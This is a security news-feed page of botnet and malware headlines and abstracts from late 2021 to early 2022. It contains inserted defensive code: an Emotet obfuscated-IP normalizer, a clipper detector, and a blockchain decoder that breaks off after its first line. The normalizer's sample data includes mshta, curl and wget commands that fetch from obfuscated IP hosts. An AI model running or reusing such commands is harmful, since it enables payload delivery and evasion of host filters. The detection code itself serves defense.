Vulnerable routers from MikroTik have been misused to form what cybersecurity researchers have called one of the largest botnet-as-a-service cybercrime operations seen in recent years. According to a new piece of research published by Avast, a cryptocurrency mining campaign leveraging the newly disrupted Glupteba botnet as well as the infamous TrickBot malware were all distributed using the same command-and-control (C2) server. "The C2 server serves as a botnet-as-a-service controlling nearly 230,000 vulnerable MikroTik routers," Avast's senior malware researcher, Martin Hron, said in a write-up, potentially linking it to what's now called the Mēris botnet. The botnet is known to exploit a known vulnerability in the Winbox component of MikroTik routers (CVE-2018-14847), enabling the attackers to gain unauthenticated, remote administrative access to any affected device. Parts of the Mēris botnet were sinkholed in late September 2021. "The CVE-2018-...
Source: The Hacker News
March 21, 2022
DirtyMoe modules expand the bot using worm-like techniques
Abstract
The DirtyMoe botnet continues to evolve and now includes a module that implements wormable propagation capabilities. In June 2021, researchers from Avast warned of the rapid growth of the DirtyMoe botnet (PurpleFox, Perkiler, and NuggetPhantom),...
Source: Security Affairs
March 18, 2022
Microsoft: Here's how this notorious botnet used hacked routers for stealthy communication
Abstract
Microsoft has filled in one new detail about how the TrickBot gang's IoT C2 devices, namely compromised MikroTik routers, were being used since 2018 for stealthy communication with infected PCs.
Source: ZDNet
March 18, 2022
Russia-linked Cyclops Blink botnet targeting ASUS routers
Abstract
The recently discovered Cyclops Blink botnet, which is believed to be a replacement for the VPNFilter botnet, is now targeting the ASUS routers. The recently discovered Cyclops Blink botnet is now targeting the ASUS routers, reports Trend...
Source: Security Affairs
March 17, 2022
New Botnet Targets Linux Devices Via Log4J Vulnerability
Abstract
New B1txor20 botnet is actively exploiting Log4j flaws in Linux systems to create a bot army that helps hackers install rootkits and steal sensitive records. The bot sends the stolen information, results of any command execution, or any other information to its C2 server in the form of a DNS reque...
Source: Cyware Alerts - Hacker News
March 17, 2022
DirtyMoe Botnet Gains New Exploits in Wormable Module to Spread Rapidly
Abstract
The malware known as DirtyMoe has gained new worm-like propagation capabilities that allow it to expand its reach without requiring any user interaction, the latest research has found. "The worming module targets older well-known vulnerabilities, e.g., EternalBlue and Hot Potato Windows privilege escalation," Avast researcher Martin Chlumecký said in a report published Wednesday. "One worm module can generate and attack hundreds of thousands of private and public IP addresses per day; many victims are at risk since many machines still use unpatched systems or weak passwords." Active since 2016, the DirtyMoe botnet is used for carrying out cryptojacking and distributed denial-of-service (DDoS) attacks, and is deployed by means of external exploit kits like PurpleFox or injected installers of Telegram Messenger. Also employed as part of the attack sequence is a DirtyMoe service that triggers the launch of two additional processes, namely the Core and...
Source: The Hacker News
March 17, 2022
Sandworm-linked CyclopsBlink botnet has another piece of hardware in its sights
Abstract
Botnet activity that drew loud warnings last month from U.S. and U.K. cybersecurity agencies has expanded to a second type of hardware, according to researchers at Trend Micro.
Source: CyberScoop
March 17, 2022
B1txor20 Linux botnet uses DNS Tunnel and Log4J exploit
Abstract
Researchers uncovered a new Linux botnet, tracked as B1txor20, that exploits the Log4J vulnerability and DNS tunnel. Researchers from Qihoo 360's Netlab have discovered a new backdoor used to infect Linux systems and include them in a botnet tracked...
Source: Security Affairs
March 16, 2022
New "B1txor20" Linux Botnet Uses DNS Tunnel and Exploits Log4J Flaw
Abstract
A previously undocumented backdoor has been observed targeting Linux systems with the goal of corralling the machines into a botnet and acting as a conduit for downloading and installing rootkits. Qihoo 360's Netlab security team called it B1txor20 "based on its propagation using the file name 'b1t,' the XOR encryption algorithm, and the RC4 algorithm key length of 20 bytes." First observed propagating through the Log4j vulnerability on February 9, 2022, the malware leverages a technique called DNS tunneling to build communication channels with command-and-control (C2) servers by encoding data in DNS queries and responses. B1txor20, while also buggy in some ways, currently supports the ability to obtain a shell, execute arbitrary commands, install a rootkit, open a SOCKS5 proxy, and functions to upload sensitive information back to the C2 server. Once a machine is successfully compromised, the malware utilizes the DNS tunnel to retrieve and execute co...
Source: The Hacker News
March 15, 2022
New Linux botnet exploits Log4J, uses DNS tunneling for comms
Abstract
A recently discovered botnet under active development targets Linux systems, attempting to ensnare them into an army of bots ready to steal sensitive info, installing rootkits, creating reverse shells, and acting as web traffic proxies.
Source: BleepingComputer
March 10, 2022
New Emotet botnet is rapidly growing, with +130K unique bots spread across 179 countries
Abstract
A few months after its return the Emotet botnet has already infected over 130,000 unique bots spread across 179 countries. The Emotet botnet continues to grow and has infected approximately 130,000 hosts since its resurrection in November 2021. Early...
Source: Security Affairs
March 09, 2022
Emotet Botnet's Latest Resurgence Spreads to Over 100,000 Computers
Abstract
The insidious Emotet botnet, which staged a return in November 2021 after a 10-month-long hiatus, is once again exhibiting signs of steady growth, amassing a swarm of over 100,000 infected hosts for perpetrating its malicious activities. "While Emotet has not yet attained the same scale it once had, the botnet is showing a strong resurgence with a total of approximately 130,000 unique bots spread across 179 countries since November 2021," researchers from Lumen's Black Lotus Labs said in a report. Emotet, prior to its takedown in late January 2021 as part of a coordinated law enforcement operation dubbed "Ladybird," had infected no fewer than 1.6 million devices globally, acting as a conduit for cybercriminals to install other types of malware, such as banking trojans or ransomware, onto compromised systems. The malware officially resurfaced in November 2021 using TrickBot as a delivery vehicle, with the latter shuttering its attack infrastructure...
Source: The Hacker News
March 9, 2022
Updated SharkBot Variant Makes its Way into Google Play Store
Abstract
Researchers exposed cybercriminals distributing the SharkBot banking trojan via Google Play Store. The malware is using Automatic Transfer Systems (ATS) to transfer money by abusing the Accessibility permission on devices and grants itself additional required permissions. Smartphone users are reque...
Source: Cyware Alerts - Hacker News
March 08, 2022
Emotet growing slowly but steadily since November resurgence
Abstract
The notorious Emotet botnet is still being distributed steadily in the wild, having now infected 130,000 systems in 179 countries.
Source: BleepingComputer
March 4, 2022
Massive Meris Botnet Embeds Ransomware Notes from REvil
Abstract
Notes threatening to tank targeted companies' stock price were embedded into the DDoS ransomware attacks as a string_of_text directed to CEOs and webops_geeks in the URL.
Source: Threatpost
March 2, 2022
TrickBot's AnchorDNS is Now Upgraded to AnchorMail
Abstract
Researchers identified an improved version of the AnchorDNS backdoor, dubbed AnchorMail, being used in Conti ransomware attacks. Post-execution, AnchorMail creates a scheduled task for persistence that runs every 10 minutes. Experts recommend training your employees to spot phishing emails is...
Source: Cyware Alerts - Hacker News
March 1, 2022
What Does TrickBot's Shutdown Imply?
Abstract
After months of inactivity, operators behind the TrickBot malware botnet appear to have gone offline with their server infrastructure. Its TTPs were becoming highly detectable. According to experts, the decline in the volume of the Trickbot campaigns is accompanied by the fact that its operators are w...
Source: Cyware Alerts - Hacker News
February 28, 2022
Electron Bot Leverages Microsoft App Store to Pierce Social Media Accounts
Abstract
An SEO poisoning bot has been taking over social media accounts and masquerading as the Temple Run game. The bot targets multiple social media accounts such as Facebook, Google, and SoundCloud.
Source: Cyware Alerts - Hacker News
February 28, 2022
Reborn of Emotet: New Features of the Botnet and How to Detect it
Abstract
One of the most dangerous and infamous threats is back again. In January 2021, global officials took down the botnet. Law enforcement sent a destructive update to the Emotet's executables. And it looked like the end of the trojan's story. But the malware never ceased to surprise. In November 2021, it was reported that TrickBot no longer works alone and delivers Emotet. And ANY.RUN with colleagues in the industry were among the first to notice the emergence of Emotet's malicious documents. And this February, we can see a very active wave with crooks running numerous attacks, hitting the top in the rankings. If you are interested in this topic or researching malware, you can make use of the special help of ANY.RUN, the interactive sandbox for the detection and analysis of cyber threats. Let's look at the new version's changes that this disruptive malware brought this time. Emotet history Emotet is a sophisticated, constantly...
Source: The Hacker News
February 24, 2022
Notorious TrickBot Malware Gang Shuts Down its Botnet Infrastructure
Abstract
The modular Windows crimeware platform known as TrickBot formally shuttered its infrastructure on Thursday after reports emerged of its imminent retirement amid a lull in its activity for almost two months, marking an end to one of the most persistent malware campaigns in recent years. "TrickBot is gone... It is official now as of Thursday, February 24, 2022. See you soon... or not," AdvIntel's CEO Vitali Kremez tweeted. "TrickBot is gone as it has become inefficient for targeted intrusions." Attributed to a Russia-based criminal enterprise called Wizard Spider, TrickBot started out as a financial trojan in late 2016 and is a derivative of another banking malware called Dyre that was dismantled in November 2015. Over the years, it morphed into a veritable Swiss Army knife of malicious capabilities, enabling threat actors to steal information via web injects and drop additional payloads. TrickBot's activities took a noticeable hit in October 20...
Source: The Hacker News
February 24, 2022
U.S., U.K. Agencies Warn of New Russian Botnet Built from Hacked Firewall Devices
Abstract
Intelligence agencies in the U.K. and the U.S. disclosed details of a new botnet malware called Cyclops Blink that's been attributed to the Russian-backed Sandworm hacking group and deployed in attacks dating back to 2019. "Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, which exploited network devices, primarily small office/home office (SOHO) routers, and network-attached storage (NAS) devices," the agencies said. "In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread." The joint government advisory comes from the U.K. National Cyber Security Centre (NCSC), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) in the U.S. Sandworm, aka Voodoo Bear, is the name assigned to a highly advanced adversary operating out of Russia that's known to be active since at least 2008.
Source: The Hacker News
February 21, 2022
Is Conti Behind the TrickBot Operation?
Abstract
In new findings, the operators of the TrickBot trojan appear to have collaborated with the creators of the Conti ransomware. The reason behind this development could be the multiple takedown attempts on the TrickBot infrastructure. However, as per claims, the bot is dead; and moving forward they w...
Source: Cyware Alerts - Hacker News
February 20, 2022
Trickbot operation is now controlled by Conti ransomware
Abstract
The Conti ransomware group takes over TrickBot malware operation and plans to replace it with BazarBackdoor malware. TrickBot operation has arrived at the end of the journey, according to AdvIntel some of its top members move under the Conti ransomware...
Source: Security Affairs
February 18, 2022
New Golang botnet empties Windows users' cryptocurrency wallets
Abstract
A new Golang-based botnet under active development has been ensnaring hundreds of Windows devices each time its operators deploy a new command and control (C2) server.
Source: BleepingComputer
February 18, 2022
Updated Trickbot Now Targets Technology and Financial Firms
Abstract
Check Point disclosed that an updated version of the TrickBot malware is targeting customers of 60 financial and technology firms primarily located in the U.S. Researchers believe that the actual victims are not the brands themselves but their customers. The malware stands as a priority threat...
Source: Cyware Alerts - Hacker News
February 17, 2022
Baby Golang-Based Botnet Already Pulling in $3K/Month for Operators
Abstract
Newborn as it is, the Kraken botnet has already spread like wildfire, thanks to the malware's author tinkering away over the past few months, adding more infostealers and backdoors.
Source: Threatpost
February 17, 2022
Researchers Warn of a New Golang-based Botnet Under Continuous Development
Abstract
Cybersecurity researchers have unpacked a new Golang-based botnet called Kraken that's under active development and features an array of backdoor capabilities to siphon sensitive information from compromised Windows hosts. "Kraken already features the ability to download and execute secondary payloads, run shell commands, and take screenshots of the victim's system," threat intelligence firm ZeroFox said in a report published Wednesday. Discovered first in October 2021, early variants of Kraken have been found to be based on source code uploaded to GitHub, although it's unclear if the repository in question belongs to the malware's operators or if they simply chose to start their development using the code as a foundation. The botnet – not to be confused with a 2008 botnet of the same name – is perpetuated using SmokeLoader, which chiefly acts as a loader for next-stage malware, allowing it to quickly scale in size and expand its network. Kraken...
Source: The Hacker News
February 17, 2022
New Kraken botnet is allowing operators to earn USD 3,000 every month
Abstract
Researchers spotted a new Golang-based botnet called Kraken that is under active development and supports a lot of backdoor capabilities. Kraken is a new Golang-based botnet discovered in late October 2021 by researchers from threat intelligence...
Source: Security Affairs
February 16, 2022
TrickBot Ravages Customers of Amazon, PayPal and Other Top Brands
Abstract
The resurgent trojan has targeted 60 top companies to harvest credentials for a wide range of applications, with an eye to virulent follow-on attacks.
Source: Threatpost
February 16, 2022
Trickbot targets customers of 60 High-Profile companies
Abstract
TrickBot malware is targeting customers of 60 financial and technology companies with new anti-analysis features. The infamous TrickBot malware was employed in attacks against customers of 60 financial and technology companies with new anti-analysis...
Source: Security Affairs
February 16, 2022
Trickbot has infected 140,000-plus machines since late 2020
Abstract
In October 2020, Microsoft reported that more than 90% of Trickbot's infrastructure had been disabled. However, the threat actor bounced back and began thriving soon after.
Source: Tech Target
February 15, 2022
Watch Out! FritzFrog Botnet Has Gone Aggressively Wild Full Text
Abstract
The operators of the FritzFrog botnet have returned with a new P2P campaign, registering a 10x growth in the infection rate within only a month. The new variant seems to possess additional capabilities to target WordPress servers. Researchers have spotted 24,000 attacks so far. However, the b...Cyware Alerts - Hacker News
February 14, 2022
TrickBot Uses Metaprogramming in BazarBackdoor Malware Full Text
Abstract
In a new twist, authors of BazarLoader and BazarBackdoor malware were spotted utilizing template-based metaprogramming to obfuscate important data. Researchers found similar code patterns in malware samples as is found when samples are built using ADVobfuscator, an obfuscation library based on C++1...Cyware Alerts - Hacker News
February 11, 2022
FritzFrog P2P Botnet is back and targets Healthcare, Education and Government Sectors Full Text
Abstract
FritzFrog P2P botnet is back and is targeting servers belonging to entities in the healthcare, education, and government sectors. FritzFrog is a sophisticated botnet that was involved in attacks against SSH servers worldwide since January 2020. The...Security Affairs
February 10, 2022
FritzFrog P2P Botnet Attacking Healthcare, Education and Government Sectors Full Text
Abstract
A peer-to-peer Golang botnet has resurfaced after more than a year to compromise servers belonging to entities in the healthcare, education, and government sectors within a span of a month, infecting a total of 1,500 hosts. Dubbed FritzFrog , "the decentralized botnet targets any device that exposes an SSH server — cloud instances, data center servers, routers, etc. — and is capable of running any malicious payload on infected nodes," Akamai researchers said in a report shared with The Hacker News. The new wave of attacks commenced in early December 2021, only to pick up pace and register a 10x growth in its infection rate in a month's time, while peaking at 500 incidents per day in January 2022. The cybersecurity firm said it detected infected machines in a European television channel network, a Russian manufacturer of healthcare equipment, and multiple universities in East Asia. FritzFrog was first documented by Guardicore in August 2020, elaborating the botnet&The Hacker News
February 10, 2022
FritzFrog botnet grows 10x, hits healthcare, edu, and govt systems Full Text
Abstract
The FritzFrog botnet that's been active for more than two years has resurfaced with an alarming infection rate, growing ten times in just a month of hitting healthcare, education, and government systems with an exposed SSH server.BleepingComputer
February 3, 2022
BotenaGo Source Code Leaked - What does it Mean? Full Text
Abstract
AT&T experts unearthed the new BotenaGo botnet, which leaked on GitHub last year. It could target 33 exploits affecting nearly 2 million routers and IoT devices. Experts also discovered several hacking tools—from several sources—in the same GitHub repository. The leak of such ready-to-use...Cyware Alerts - Hacker News
January 31, 2022
TrickBot Operators Strengthen Obfuscation Game with Layered Security Full Text
Abstract
The TrickBot gang has advanced its techniques to slip past security controls by adding multiple layers of defense. This enables it to launch Man-in-the-Browser attacks against banking users to steal their credentials and browser cookies. It is critical for organizations and researchers to cont...Cyware Alerts - Hacker News
January 27, 2022
BotenaGo Botnet Code Leaked to GitHub, Impacting Millions of Devices Full Text
Abstract
The malware had already put millions of routers and IoT devices at risk, and now any noob can have at it.Threatpost
January 27, 2022
Widespread FluBot and TeaBot Malware Campaigns Targeting Android Devices Full Text
Abstract
Researchers from the Bitdefender Mobile Threats team said they have intercepted more than 100,000 malicious SMS messages attempting to distribute Flubot malware since the beginning of December. "Findings indicate attackers are modifying their subject lines and using older yet proven scams to entice users to click," the Romanian cybersecurity firm detailed in a report published Wednesday. "Additionally, attackers are rapidly changing the countries they are targeting in this campaign." The new wave of attacks is said to have been most active in Australia, Germany, Poland, Spain, Austria, and Italy, among others, with attacks spreading to newer countries like Romania, the Netherlands, and Thailand starting mid-January. FluBot (aka Cabassous) campaigns use smishing as the primary delivery method to target potential victims, wherein users receive an SMS message with the question "Is this you in this video?" and are tricked into clicking a link that instThe Hacker News
January 26, 2022
TrickBot Crashes Security Researchers’ Browsers in Latest Upgrade Full Text
Abstract
The malware has added an anti-debugging tool that crashes browser tabs when researchers use code beautifying for analysis.Threatpost
January 26, 2022
Threat Actors Blanket Androids with Flubot, Teabot Campaigns Full Text
Abstract
Attackers are getting creative, using smishing & a malicious Google Play QR reader to plant banking trojans on the phones of victims across the globe.Threatpost
January 26, 2022
New FluBot and TeaBot campaigns target Android devices worldwide Full Text
Abstract
New FluBot and TeaBot malware distribution campaigns have been spotted, using typical smishing lures or laced apps against Android users in Australia, Germany, Poland, Spain, and Romania.BleepingComputer
January 25, 2022
TrickBot now crashes researchers’ browsers to block malware analysis Full Text
Abstract
The notorious TrickBot malware has received new features that make it more challenging to research, analyze, and detect in the latest variants, including crashing browser tabs when it detects beautified scripts.BleepingComputer
January 25, 2022
TrickBot Operators Bolster Layered Defenses to Prevent Injection Research Full Text
Abstract
The operators behind the notorious TrickBot malware have once again updated their evasion techniques by adding multiple layers of defense to slip past antimalware products.Security Intelligence
January 23, 2022
Emotet Now Using Unconventional IP Address Formats to Evade Detection Full Text
Abstract
Social engineering campaigns involving the deployment of the Emotet malware botnet have been observed using "unconventional" IP address formats for the first time in a bid to sidestep detection by security solutions. This involves the use of hexadecimal and octal representations of the IP address that, when processed by the underlying operating systems, get automatically converted "to the dotted decimal quad representation to initiate the request from the remote servers," Trend Micro's Threat Analyst, Ian Kenefick, said in a report Friday. The infection chains, as with previous Emotet-related attacks, aim to trick users into enabling document macros and automate malware execution. The document uses Excel 4.0 Macros, a feature that has been repeatedly abused by malicious actors to deliver malware. Once enabled, the macro invokes a URL that's obfuscated with carets, with the host incorporating a hexadecimal representation of the IP address — "hThe Hacker News
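The entry above describes Emotet hiding its download host behind hexadecimal and octal IPv4 literals (which the OS resolves via the classic inet_aton() rules) and caret-escaped URLs in cmd.exe. The following is an added example, not code from the Trend Micro report or from Emotet itself: a normalizer that rewrites every inet_aton()-style literal (single dword, a.b, a.b.c or a.b.c.d with hex, octal or decimal parts) to dotted-quad form and flags URLs whose host was not written as plain dotted decimal. The sample lines are constructed for this example and use RFC 1918 addresses; they are not indicators from the campaign.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample log lines for this example. Hosts are RFC 1918 literals written in the
# alternative forms inet_aton() accepts; they are not indicators from the Emotet campaign.
SAMPLE_LINES = [
    "cmd /c mshta h^t^t^p://0xc0a80001/doc.html",      # carets (cmd.exe escapes) + hex dword
    "curl http://0300.0250.0.01/x",                     # octal octets
    "GET http://3232235521/ HTTP/1.1",                  # decimal dword
    "wget http://0xc0.0xa8.0.0x1/y",                    # mixed hex/decimal octets
    "curl http://example.com/",                         # ordinary hostname, not flagged
]

_HOST_RE = re.compile(r"https?://([^/\s:?#]+)")
# One inet_aton() component: hex (0x..), octal (leading 0) or decimal.
_PART_RE = re.compile(r"(0[xX][0-9a-fA-F]+)|(0[0-7]*)|([1-9][0-9]*)")


def _parse_part(part: str) -> int:
    m = _PART_RE.fullmatch(part)
    if m is None:
        raise ValueError(part)
    if m.group(1):
        return int(part[2:], 16)
    if m.group(2):
        return int(part, 8)
    return int(part)


def normalize_ipv4_literal(host: str) -> Optional[str]:
    """Return the dotted-quad form of `host` if it is an IPv4 literal under the
    classic inet_aton() rules (a, a.b, a.b.c or a.b.c.d with hex/octal/decimal
    parts), otherwise None. Implemented here rather than via socket.inet_aton so
    the result is the same on every platform."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # Width in bits of each component: the last one absorbs the remaining octets.
    widths = {1: [32], 2: [8, 24], 3: [8, 8, 16], 4: [8, 8, 8, 8]}[len(parts)]
    addr = 0
    for value, bits in zip(values, widths):
        if value >= (1 << bits):
            return None
        addr = (addr << bits) | value
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def find_obfuscated_hosts(lines: List[str]) -> List[Tuple[str, str]]:
    """Scan command/URL lines and return (as-written host, dotted quad) for every
    URL whose host is an IPv4 literal written in a non dotted-decimal form."""
    hits = []
    for line in lines:
        # cmd.exe drops a lone '^' escape before the next character, so strip them
        # before matching, as the shell would.
        cleaned = line.replace("^", "")
        for host in _HOST_RE.findall(cleaned):
            normalized = normalize_ipv4_literal(host)
            if normalized is not None and normalized != host:
                hits.append((host, normalized))
    return hits


if __name__ == "__main__":
    for host, quad in find_obfuscated_hosts(SAMPLE_LINES):
        print(f"{host:>20} -> {quad}")
```

Run the normalizer over the host field before any allow-list or reputation lookup; a rule that only matches dotted-decimal IPs misses all four of the obfuscated forms above, and a URL parser that defers to the OS resolver will happily connect to them.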
January 14, 2022
Researchers Reveal Abcbot’s Connection With Xanthe Malware Full Text
Abstract
Cado Security confirmed a link between the Abcbot botnet and cryptomining attacks by the Xanthe malware group after analyzing similarities within the code and feature-sets of both the malware families. Experts added that cybercriminals could be slowly doing away with cryptomining attacks to adopt...Cyware Alerts - Hacker News
January 10, 2022
Abcbot Botnet Linked to Operators of Xanthe Cryptomining malware Full Text
Abstract
New research into the infrastructure behind an emerging DDoS botnet named Abcbot has uncovered links with a cryptocurrency-mining botnet attack that came to light in December 2020. Attacks involving Abcbot, first disclosed by Qihoo 360's Netlab security team in November 2021, are triggered via a malicious shell script that targets insecure cloud instances operated by cloud service providers such as Huawei, Tencent, Baidu, and Alibaba Cloud to download malware that co-opts the machine to a botnet, but not before terminating processes from competing threat actors and establishing persistence. The shell script in question is itself an iteration of an earlier version originally discovered by Trend Micro in October 2021 hitting vulnerable ECS instances inside Huawei Cloud. But in an interesting twist, continued analysis of the botnet by mapping all known Indicators of Compromise (IoCs), including IP addresses, URLs, and samples, has revealed Abcbot's code and feature-leveThe Hacker News
January 10, 2022
Abcbot and Xanthe botnets have the same origin, experts discovered Full Text
Abstract
Experts linked the C2 infrastructure behind the Abcbot botnet to a cryptocurrency-mining botnet attack that was uncovered in December 2020. Experts linked the infrastructure used by the Abcbot DDoS botnet to the operations of a cryptocurrency-mining...Security Affairs
December 29, 2021
Threat Advisory: E-commerce Bots Use Domain Registration Services for Mass Account Fraud Full Text
Abstract
Jason Kent, hacker-in-residence at Cequence Security, discusses sneaky shopping bot tactics (i.e., domain parking) seen in a mass campaign, and what retail security teams can do about them.Threatpost
December 24, 2021
Bots are stealing Christmas! Full Text
Abstract
Past research has shown that attacks originating from China are typically near the top of any botting activity list, but during this time period, China was 6th at only 2.3% of overall bad bot traffic.Help Net Security
December 22, 2021
A new version of the Abcbot bot targets Chinese cloud providers Full Text
Abstract
Researchers spotted a new botnet named Abcbot that mainly targeted Chinese cloud hosting providers over the past months. Security researchers discovered a new botnet, named Abcbot, that focused on Chinese cloud hosting providers over the past...Security Affairs
December 21, 2021
New Abcbot Botnet Targets Linux Servers Hosted by Alibaba Cloud, Huawei Cloud, Tencent, and Baidu Full Text
Abstract
Cado Security said in a report that the botnet has targeted servers hosted by Alibaba Cloud, Baidu, Tencent, and Huawei Cloud, echoing previous findings from Trend Micro and Qihoo 360 Netlab.The Record
December 17, 2021
Phorpiex botnet is back, in 2021 it stole $500K worth of crypto assets Full Text
Abstract
Experts reported the resurgence of the Phorpiex botnet; in one year it allowed its operators to steal crypto assets worth half a million dollars. Experts at Check Point Research have monitored the resurgence of the Phorpiex botnet, an old threat that was involved...Security Affairs
December 16, 2021
New Phorpiex Botnet Variant Steals Half a Million Dollars in Cryptocurrency Full Text
Abstract
Cryptocurrency users in Ethiopia, Nigeria, India, Guatemala, and the Philippines are being targeted by a new variant of the Phorpiex botnet called Twizt that has resulted in the theft of virtual coins amounting to $500,000 over the last one year. Israeli security firm Check Point Research, which detailed the attacks, said the latest evolutionary version "enables the botnet to operate successfully without active [command-and-control] servers," adding it supports no less than 35 wallets associated with different blockchains, including Bitcoin, Ethereum, Dash, Dogecoin, Litecoin, Monero, Ripple, and Zilliqa, to facilitate crypto theft. Phorpiex , otherwise known as Trik, is known for its sextortion spam and ransomware campaigns as well as cryptojacking, a scheme that leverages the targets' devices such as computers, smartphones, and servers to secretly mine cryptocurrency without their consent or knowledge. It's also infamous for its use of a technique called cryThe Hacker News
December 16, 2021
Phorpiex botnet returns with new tricks making it harder to disrupt Full Text
Abstract
The previously shutdown Phorpiex botnet has re-emerged with new peer-to-peer command and control infrastructure, making the malware more difficult to disrupt.BleepingComputer
December 16, 2021
Variant of Phorpiex Botnet Used for Cryptocurrency Attacks in Ethiopia, Nigeria, India, and 93 Other Countries Full Text
Abstract
The cybercriminals behind the attacks are using a variant of the Phorpiex botnet -- dubbed "Twizt" -- to steal cryptocurrency through a process called "crypto clipping" from users across 96 countries.ZDNet
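The Twizt entries above (Check Point's report on the 35 supported wallet types, and ZDNet's note on "crypto clipping") describe a clipper: malware that watches the clipboard and, when the victim copies a wallet address, silently swaps in the attacker's address of the same chain. The following is an added detection sketch, not code from Check Point or from the malware: a small address classifier plus a rule that fires when a wallet address is replaced by a different address of the same chain by a different process within a short window. The process names, address regexes (deliberately limited to four chains) and the clipboard history are constructed for this example; a real monitor would feed it events from a clipboard hook rather than a list.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Address shapes this example recognises. Coverage is deliberately narrow (the
# Twizt variant reportedly handles 35 wallet types); extend the table as needed.
WALLET_PATTERNS = {
    "btc_legacy": re.compile(r"[13][1-9A-HJ-NP-Za-km-z]{25,34}"),
    "btc_bech32": re.compile(r"bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{25,87}"),
    "eth": re.compile(r"0x[0-9a-fA-F]{40}"),
    "xmr": re.compile(r"4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}"),
}


def classify_address(text: str) -> Optional[str]:
    """Return the chain label if the whole clipboard string looks like a wallet address."""
    text = text.strip()
    for chain, pattern in WALLET_PATTERNS.items():
        if pattern.fullmatch(text):
            return chain
    return None


@dataclass
class ClipEvent:
    t: float      # seconds since monitoring started
    owner: str    # process that wrote the clipboard (hypothetical names below)
    text: str


def detect_clipper(events: List[ClipEvent], window: float = 2.0) -> List[Tuple[str, str, str, str]]:
    """Flag clipboard writes that replace one wallet address with a different address
    of the same chain, from a different process, within `window` seconds of the
    original copy: the signature of a clipper swapping in the attacker's wallet."""
    alerts = []
    prev: Optional[ClipEvent] = None
    prev_chain: Optional[str] = None
    for ev in events:
        chain = classify_address(ev.text)
        if (prev is not None and chain is not None and chain == prev_chain
                and ev.text != prev.text and ev.owner != prev.owner
                and ev.t - prev.t <= window):
            alerts.append((prev.owner, ev.owner, prev.text, ev.text))
        prev, prev_chain = ev, chain
    return alerts


# Constructed clipboard history: the user copies an Ethereum address in the browser and
# a second process overwrites it 300 ms later; the later Bitcoin re-copy is the user's own.
ETH_USER, ETH_SWAPPED = "0x" + "a" * 40, "0x" + "b" * 40
BTC_A, BTC_B = "1" + "A" * 30, "1" + "B" * 30
SAMPLE_EVENTS = [
    ClipEvent(0.0, "browser.exe", ETH_USER),
    ClipEvent(0.3, "unknown.exe", ETH_SWAPPED),
    ClipEvent(10.0, "browser.exe", "https://wallet.example.test/send"),
    ClipEvent(20.0, "browser.exe", BTC_A),
    ClipEvent(21.0, "browser.exe", BTC_B),
]

if __name__ == "__main__":
    for src, dst, before, after in detect_clipper(SAMPLE_EVENTS):
        print(f"clipper? {src} copied {before[:10]}..., {dst} replaced it with {after[:10]}...")
```

Two caveats a practitioner should keep in mind: the owner check is only as good as the clipboard-owner attribution the platform gives you (a clipper injected into the browser process defeats it), and the regexes only say a string has the right shape, so the final safeguard remains the user comparing the pasted address against the intended one before sending.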
December 13, 2021
Two Linux botnets already exploit Log4Shell flaw in Log4j Full Text
Abstract
Immediately after the disclosure of the Log4Shell flaw in the Log4j library, threat actors started including exploit code for it in Linux botnets. Researchers at NetLab 360 reported that their Anglerfish and Apacket honeypots were already hit by attacks...Security Affairs
December 11, 2021
Moobot Botnet Eyes Hikvision Products Full Text
Abstract
Moobot, a Mirai-based botnet, is reportedly abusing a critical flaw in the webserver of many Hikvision products, which were sanctioned by the U.S. in the wake of human rights abuse. The botnet is abusing a critical command injection flaw to target unpatched devices and extract sensitive data from v...Cyware Alerts - Hacker News
December 9, 2021
Fueled by Pandemic Realities, Grinchbots Aggressively Surge in Activity Full Text
Abstract
E-commerce’s proverbial Who-ville is under siege, with a rise in bots bent on ruining gift cards and snapping up coveted gifts for outrageously priced resale.Threatpost
December 9, 2021
Dark Mirai botnet spreads targeting RCE on TP-Link routers Full Text
Abstract
A botnet tracked as Dark Mirai spreads by exploiting a new vulnerability affecting TP-Link TL-WR840N EU V5 home routers. Dark Mirai botnet spreads by exploiting a new vulnerability, tracked as CVE-2021-41653, affecting TP-Link TL-WR840N EU V5 home...Security Affairs
December 09, 2021
Dark Mirai botnet targeting RCE on popular TP-Link router Full Text
Abstract
The botnet known as Dark Mirai (aka MANGA) has been observed exploiting a new vulnerability on the TP-Link TL-WR840N EU V5, a popular inexpensive home router released in 2017.BleepingComputer
December 9, 2021
Moobot botnet spreads by exploiting CVE-2021-36260 flaw in Hikvision products Full Text
Abstract
Moobot is a Mirai-based botnet that is leveraging a critical command injection vulnerability in the webserver of some Hikvision products. The Mirai-based Moobot botnet is rapidly spreading by exploiting a critical command injection flaw, tracked...Security Affairs
December 08, 2021
Google Disrupts Blockchain-based Glupteba Botnet; Sues Russian Hackers Full Text
Abstract
Google on Tuesday said it took steps to disrupt the operations of a sophisticated "multi-component" botnet called Glupteba that infected more than one million Windows computers across the globe and stored its command-and-control server addresses on Bitcoin's blockchain as a resilience mechanism. As part of the efforts, Google's Threat Analysis Group (TAG) said it partnered with the CyberCrime Investigation Group over the past year to terminate around 63 million Google Docs that were observed to have distributed the malware, alongside 1,183 Google Accounts, 908 Cloud Projects, and 870 Google Ads accounts that were associated with its distribution. Google TAG said it worked with internet infrastructure providers and hosting providers, such as CloudFlare, to dismantle the malware by taking down servers and placing interstitial warning pages in front of the malicious domains. In tandem, the internet giant also announced a lawsuit against two Russian indiThe Hacker News
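The resilience mechanism mentioned above, C2 addresses parked on the Bitcoin blockchain, works because anyone can embed up to a few dozen bytes in a transaction output that starts with OP_RETURN, and a bot can fetch transactions for a hard-coded address from any public node or explorer without contacting attacker infrastructure. The following is an added example, not Google's analysis tooling or Glupteba's own code: a decoder that walks a serialised Bitcoin transaction (legacy or segwit framing), finds OP_RETURN outputs and returns their data pushes, together with a builder that constructs a sample transaction to decode. The transaction and the hostname `c2.example.test` are constructed for this example; decoding the push as a plain hostname is also an assumption of the example, since real malware generally encrypts or encodes it first.

```python
import struct
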